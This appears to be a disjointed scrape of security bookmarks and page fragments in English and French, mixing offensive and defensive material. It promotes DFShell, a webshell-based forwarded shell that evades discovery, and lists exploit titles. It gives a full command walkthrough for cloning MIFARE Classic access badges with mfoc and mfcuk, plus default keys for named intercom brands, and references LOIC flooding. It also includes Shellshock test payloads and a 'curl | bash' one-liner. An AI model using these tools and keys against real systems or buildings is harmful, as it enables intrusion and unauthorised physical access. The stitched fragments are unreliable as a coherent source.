How long it take to CRACK your password ??
DFShell - The Best Forwarded Shell
2 hrs ago 8:30 AM | Post sponsored by FaradaySEC | Multiuser Pentest Environment Zion3R
██████╗ ███████╗███████╗██╗ ██╗███████╗██╗ ██╗
██╔══██╗██╔════╝██╔════╝██║ ██║███╔═══╝██║ ██║
██║ ██║█████╗ ███████╗███████║█████╗ ██║ ██║
██║ ██║██╔══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██████╔╝██║ ███████║██║ ██║███████╗████████╗███████╗
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝
D3Ext's Forwarded Shell it's a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in /dev/shm/.fs/ and there are stored the fifos. You can even have a tty over a webshell.
In case you want a good webshell with code obfuscation, login panel and more functions you have this webshell (scripted by me), you can change the username and the password at the top of the file, it also have a little protection in case of beeing discovered because if the webshell is accessed from localhost it gives a 404 status code
Why you should use DFShell?
To use other forwarded shells you have to edit the script to change the url and the parameter of the webshell, but DFShell use parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter), the script have a pretty output with colors, you also have custom commands to upload and download files from the target, do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.
If you change the actual user from webshell (or anything get unstable) then execute: 'sh'
Flipper Zero
Flipper Zero is a portable multi-tool for pentesters and geeks in a toy-like body. It loves hacking digital stuff, such as radio protocols, access control systems, hardware and more. It's fully open-source and customizable, so you can extend it in whatever way you like.
Analysis Report http://winnti-scanner-victims-will-be-notified.threatsinkhole.com
Exploits of the week
Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)
Code Blocks 20.03 - Denial Of Service (PoC)
WebPort 1.19.1 - 'setup' Reflected Cross-Site Scripting
WebPort 1.19.1 - Cross Site Scripting
Frigate 2.02 - Denial Of Service (PoC)
Responsive Online Blog 1.0 - 'id' SQL Injection
Trend Micro Web Security - Remote Code Execution
Lansweeper 7.2 Default Account / Remote Code Execution
Student Enrollment 1.0 - Remote Code Execution
FileRun CVE-2019-12905 - Cross Site Scripting
pentest test hack vul
Accounts
8,165,160,541
Leaks
810
Leaked accounts per day
879,875
Is someone spying on you?
Everyday personal data is stolen in criminal cyber attacks. A large part of the stolen information is subsequently made public on Internet databases, where it serves as the starting point for other illegal activities.
With the HPI Identity Leak Checker, it is possible to check whether your email address, along with other personal data (e.g. telephone number, date of birth or address), has been made public on the Internet where it can be misused for malicious purposes.
sudo apt install libnfc-dev libnfc5 libnfc-bin libusb-dev make gcc unzip automake
wget -O mfoc-master.zip https://github.com/nfc-tools/mfoc/archive/master.zip
unzip mfoc-master.zip
rm mfoc-master.zip
cd mfoc-master/
autoreconf -vis
./configure
make
sudo make install
cd ..
nfc-list
sudo modprobe -r pn533-usb pn533 nfc
sudo nano /etc/modprobe.d/blacklist-libnfc.conf
blacklist pn533_usb
blacklist pn533
blacklist usb
wget -O mfcuk-master.zip https://github.com/DrSchottky/mfcuk/archive/master.zip
unzip mfcuk-master.zip
rm mfcuk-master.zip
cd mfcuk-master/
autoreconf -vfi
./configure
sed -i "s#./data/tmpls#/usr/share/mfcuk/data/tmpls#" src/mfcuk_finger.c
sudo mkdir -p /usr/share/mfcuk/data/
sudo cp -r src/data/* /usr/share/mfcuk/data/
make
sudo make install
cd ..
mfoc -k 8829da9daf76 -O badge.dmp
mfcuk -C -R 0:A -s 250 -S 250 -v 3 > log_mfcuk&
tail -f log_mfcuk
pgrep mfcuk
kill -15 <pid de mfcuk>
mfoc -k XXXXXXXXXXXX -O badge.dmp
mfoc -P 500 -O new_carte.dmp
nfc-mfclassic W a badge.dmp new_carte.dmp
Sources :
https://zozs.se/2014/08/18/acr122u-mfcuk-mfoc-cracking-mifare-classic-on-arch-linux/
http://www.latelierdugeek.fr/2015/07/17/dupliquer-contenu-puce-rfid-mifare-classic/
https://geekz0ne.fr/wiki/doku.php?id=modifier_informations_badges_selecta
Ixeygrek ( merci ;-) )
Quelques clés :
bticino : 021209197591
urmet : 8829da9daf76
ALARON BLARON : 414C41524F4E
generique : D3F7D3F7D3F7
Intratone : 484558414354
Comelit : 4A6352684677
https://github.com/iceman1001/proxmark3
https://github.com/iceman1001/proxmark3/blob/master/client/default_keys.dic
C’est maintenant que commence votre droit d’être à l’abri du piratage informatique.
Firefox Monitor met à votre disposition des outils pour conserver vos informations personnelles en toute sécurité. Découvrez quelles sont les données personnelles accessibles aux cybercriminels et apprenez à vous protéger.
Voyez si vous avez été impliqué dans une fuite de données.
L’adresse électronique doit être valide.
MOTEUR DE RECHERCHE DES FAILLES ET TOOLS
This is a simple place where you can download crackmes to improve your reverse engineering skills. If you want to submit a crackme or a solution to one of them, you must register. But before that, I strongly recommend you to read the FAQ
Number of users:
1500
Number of crackmes:
3016
Number of solutions:
4206
Inj3ct0r is the ultimate database of exploits and vulnerabilities and a great resource for vulnerability researchers and security professionals.
Our aim is to collect exploits from submittals and various mailing lists and concentrate them in one, easy-to-navigate database.
This was written solely for educational purposes. Use it at your own risk. The author will be not responsible for any damage. // r0073r
0day.today Available within TOR at http://mvfjfugdwgc5uwho.onion
Simple IOC Scanner
Scanner for Simple Indicators of Compromise
PHP scanner written in Python for identifying PHP backdoors and php malicious code. This tool is mainly reusing below mentioned tools. To use this tool, you need to install yara library for Python from the source.
Does its very best to detect obfuscated/dodgy code as well as files using PHP functions often used in malwares/webshells. Detection is performed by crawling the filesystem and testing files against a set of YARA rules.
Scans the current working directory and display results with the score greater than the given value. Released under the MIT license.
an open source program which looks for security vulnerabilities, code-quality, performance, and conformance.
Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.
A static source code analyser for vulnerabilities in PHP .scripts
an open source web server scanner which performs comprehensive tests against web servers for multiple items, including potentially dangerous files/program.
ClamAV extension for PHP (php-clamav) - a fork of the php-clamavlib project allows to incorporate virus scanning features in your PHP scripts.
Check also the following security websites:
Founded in January 2005, the PHP Security Consortium (PHPSC) is an international group of PHP experts dedicated to promoting secure programming practices within the PHP community. Members of the PHPSC seek to educate PHP developers about security through a variety of resources, including documentation, tools, and standards.
Le chercheur en sécurité Xudong Zheng a publié un article très intéressant sur les noms de domaine forgés en punycode avec des caractères exotiques, ce qui permet de régler le problème de l'internationalisation des noms de domaine dans d'autres alphabets.
Ça part d'un bon sentiment, mais comme toujours, il y a quelques faiblesses dans le truc. En effet, niveau sécurité c'est problématique, car certains caractères ASCII sont difficiles à discerner d'autres caractères plus courants. Par exemple, si vous enregistrez le nom de domaine "xn--pple-43d.com", celui-ci s'affichera dans votre navigateur comme ceci : "аpple.com". Ça ne se voit pas au premier coup d'oeil, mais ce que vous pensez être le "a" d'Apple (en ASCII : U+0061) est en fait le caractère cyrillique "а" (Code ASCII : U+0430).
Cette technique dont j'ai déjà parlée sur ce site, utilisée principalement dans des attaques de type phishing est connue sous le nom d'attaque homographique.
Heureusement, les navigateurs récents limitent ces attaques lorsqu'ils détectent des mélanges entre des caractères classiques et des caractères internationaux. Mais que ce soit Chrome, Firefox ou Opera, tous échouent lorsque l'intégralité du nom de domaine contient uniquement des caractères ASCII internationaux. Par exemple le nom de domaine "аpple.com" qui en réalité est enregistré sous le nom "xn--80ak6aa92e.com" arrive à contourner la protection en utilisant uniquement des caractères cyrilliques.
Vous pouvez faire le test vous-même via cette URL.
https://www.аррӏе.com/
Entrez dans le champ d'URL :
about:config
Puis cherchez la clé :
network.IDN_show_punycode
Et mettez là à TRUE.
Ainsi, les noms de domaines exotiques s'afficheront au format punycode, ce qui vous évitera de tomber dans le panneau.
Autrement, en cas de doute, ce que vous pouvez faire c'est de retaper vous-même l'URL.
faille include
ABOUT
hackmud is a cyberpunk themed text-based hacking simulator for intel-compatible personal home computers. Get lost in a deep and complex world full of challenging puzzles.
Find the source of your leaks
There are currently 1,976,046,540 accounts in our database.
exploits
A DIY Guide #antisec
tool secu windows // hack Phrozen Freeware
Mot de passe par défaut
Vous trouverez ci-dessous une liste de mots de passe par défaut (d'usine), pour différents appareils.
Afin de vous proposer une liste de mots de passe de qualité, tous les mots de passe ont été vérifiés.
secu hack site list defacement
Beaucoup de personnes posent une question récurrente sur les forums : « Mon compte X a été piraté, comment faire pour le récupérer ?« . Voici une bible de référence qui recense les différentes possibilités et procédures selon les services Web.
I, NewEraCracker, am not responsible for how you use this tool. You cannot blame me if you get caught for attacking servers you don't own. This tool is released for educational purposes only, and comes with no warranty at all.
HOW TO RUN ON WINDOWS
GET THE BINARIES!
Requires Microsoft .NET Framework 3.5 Service Pack 1, available at: http://www.microsoft.com/downloads/en/details.aspx?FamilyID=ab99342f-5d1a-413d-8319-81da479ab0d7&displaylang=en
HOW TO RUN ON LINUX / MACOSX
LOIC Hack Stress test
shellshocker
What is #shellshock?
Shellshock (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. If your system has not updated bash in since Tue Sep 30 2014: 1:32PM EST (See patch history), you're most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) to the most recent version 4.3 according to NVD.
You can use this website to test if your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk for attack.
You can test if a system is vulnerable by using the form below. Just provide a http or https url and test away!
Url
Please test responsibly. All tests details are logged. Do not test against websites that you do not have permission to test against. All data is archived in case of abuse.
Here is an example script that is vulnerable. Place this in your /cgi-bin/shockme.cgi and try hitting it with the shock tester.
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
Last updated Friday September 26th at 4:43PM EST: This website tester will now wait for a valid response before returning the state of the vulnerability. If the server responds with a 500 we assume you're vulnerable and we display the response immediately without waiting. If we get any other response code we will wait 3 seconds for a reply from your server and display if you're vulnerable or not.
Testing Your System
To test your system, you can simply run this one liner below to find if you're vulnerable.
curl https://shellshocker.net/shellshock_test.sh | bash
You can view the source of shellshock_test.sh on GitHub.
If you want to test each exploit individually without running the script above, feel free! They are listed below.
Exploit 1 (CVE-2014-6271)
There are a few different ways to test if your system is vulnerable to shellshock. Try running the following command in a shell.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If you see "vulnerable" you need to update bash. Otherwise, you should be good to go.
Exploit 2 (CVE-2014-7169)
Even after upgrading bash you may still be vulnerable to this exploit. Try running the following code.
env X='() { (shellshocker.net)=>\' bash -c "echo date"; cat echo; rm ./echo
If the above command outputs the current date (it may also show errors), you are still vulnerable.
Exploit 3 (???)
Here is another variation of the exploit. Please leave a comment below if you know the CVE of this exploit.
env X=' () { }; echo hello' bash -c 'date'
If the above command outputs "hello", you are vulnerable.
Exploit 4 (CVE-2014-7186)
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' ||
echo "CVE-2014-7186 vulnerable, redir_stack"
A vulnerable system will echo the text "CVE-2014-7186 vulnerable, redir_stack".
Exploit 5 (CVE-2014-7187)
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash ||
echo "CVE-2014-7187 vulnerable, word_lineno"
A vulnerable system will echo the text "CVE-2014-7187 vulnerable, word_lineno".
Exploit 6 (CVE-2014-6278)
shellshocker='() { echo You are vulnerable; }' bash -c shellshocker
You shouldn't see "You are vulnerable", if you're patched you will see "bash: shellshocker: command not found"
Exploit 7 (CVE-2014-6277)
bash -c "f() { x() { ;}; x() { ;} <<a; }" 2>/dev/null || echo vulnerable
If the command outputs "vulnerable", you are vulnerable.
If you've tested your system, please leave a comment below. Don't forget to include your bash version and what OS you're running. Type bash --version for bash, and cat /etc/release for your OS.
Indexeus
Account recovery, People Search & Consultancy made easy!
Le mouchard universel présent sur les PC, Mac et appareils Android « Korben
« Korben
Heartbleed : Faille critique pour OpenSSL, correctifs disponibles en urgence | UnderNews
Le port 32764 ouvert sur les routeurs Linksys et Netgear est une backdoor «
Threat'Intelligence'Group
A Team Cymru EIS Report:
Growing Exploitation of Small
OfCice Routers Creating Serious Risks
www.team-cymru.com!
!Growing!Exploitation!of!Small!
OfCice!Routers!Creating!Serious!Risks!
Switch from Google's location service to Mozilla's own in Firefox | Ghacks
Bienvenue [Root Me : plateforme d'apprentissage dédiée au Hacking et à la Sécurité de l'Information]
NewbieContest : Challenge informatique francophone
Korben
Top 10 des pirates informatiques arrêtés en 2013 | UnderNews
Kali Linux Official Documentation